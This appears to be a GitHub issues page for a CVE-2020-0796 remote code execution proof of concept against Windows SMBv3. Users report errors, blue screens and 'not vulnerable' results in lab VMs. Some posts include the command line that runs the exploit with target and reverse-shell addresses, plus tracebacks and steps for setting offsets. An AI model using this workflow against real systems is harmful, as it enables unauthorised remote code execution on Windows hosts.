jamf / cve-2020-0796-rce-poc Goto Github PK

win10 1909, 10.0.18363
Hotfix:
[01]: KB4515871
[02]: KB4513661
[03]: KB4516115
[04]: KB4517245
[05]: KB4521863
[06]: KB4517389

When I run the POC, it always said "Leak failed, retrying"

Hi!
virtualbox+win10 1903 business+python3.7+closed WAF+closed security center
then cause blue screen, and no shell return.

Hi,

i have received this error message after executed the SMBleedingGhost.py script and the output of the error message is:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.131 192.168.75.129 4444
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.

Traceback (most recent call last):
File "SMBleedingGhost.py", line 909, in
exploit(target_ip, reverse_shell_ip, int(reverse_shell_port))
File "SMBleedingGhost.py", line 854, in exploit
allocation_pool_object_ptr = leak_allocation_pool_object_ptr(ip_address)
File "SMBleedingGhost.py", line 522, in leak_allocation_pool_object_ptr
address = leak_ptr(ip_address, ptr_offset, ptr_list)
File "SMBleedingGhost.py", line 480, in leak_ptr
byte_value = leak_ptr_byte(ip_address, ptr_offset + byte_index, ptr_list)
File "SMBleedingGhost.py", line 454, in leak_ptr_byte
if leak_if_ptr_byte_larger_than_value(ip_address, byte_offset, ptr_list, mid):
File "SMBleedingGhost.py", line 414, in leak_if_ptr_byte_larger_than_value
data = b'B'*offset + compress(payload)
File "SMBleedingGhost.py", line 272, in compress
RtlCompressBuffer = ctypes.windll.ntdll.RtlCompressBuffer
AttributeError: module 'ctypes' has no attribute 'windll'
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

Please help and i would appreciate the assistance. =)

Hello,

I ran the ROC and double checked the Offsets values.

The server 2019 is a VM and not patched with KB4512941. (but patched up to March, 2020)

ROC respond with "Target is not vulnerable"

Is this expected behavior?

Thanks

Hi the exploit is working fine but I get this error. sock.connect((ip_address, 445))
TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.

It crashes my Victim. Tried many works. working on it for days. Any fix?

I can get all the argments needed on my own windows10, but only 3 on target Windows 10. The three argments are '''srvnet!imp_IoSizeofWorkItem''','''srvnet!imp_RtlCopyUnicodeString''' and '''nt!IoSizeofWorkItem'''.

I also tried adding the rest two argments copied from my local real windows to SMBleedingGhost.py, but when I ran the script, the virtual windows10 would soon got a bluescreen.

So I'm just wonderring what's going on.

I'll be really grateful for your quick response!

The POC works on my VM windows 10 1909 but if I use the reverse shell at all even just a whoami command it will cause the VM to BSOD after a few minutes of not typing any commands.

Hi,

I have encounter an issue when running the SMBleedingGhost.py script and the issue message is -> Target is not vulnerable.

I have followed the instructions in the readme.md and i ran the 2 scripts in the following sequential ways.

1/ Run calc_target_offsets.bat on the Target VM (Windows 10 Pro - version 1909) and obtain the offset values.

2/ Amend the SMBleedingGhost.py script (after obtained the offset values from the target VM) and modify the offset value in the SMBleedingGhost.py script.

3/ Run the SMBleedingGhost.py with the necessary parameters and below is the command output after executed:

root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master# python3.8 SMBleedingGhost.py 192.168.75.128 (target IP) 192.168.75.129 (reverse shell IP) 4444 (reverse port number)
CVE-2020-0796 Remote Code Execution POC
(c) 2020 ZecOps, Inc.

Target is not vulnerable
root@attackerpc:/home/labadmin/Desktop/CVE-2020-0796-RCE-POC-master#

My Windows 10 VM information:

vRAM : 4GB
Number of Processors : 1
Number of cores per Processors : 1
OS information : Windows 10 Pro Version 1909 (OS Build 18363.900)

Please help and advise why this is happening. In addition, i have a scan results to determine that my Windows 10 VM is vulnerable to the vulnerability. Let me know if you need the scan results.

Thank you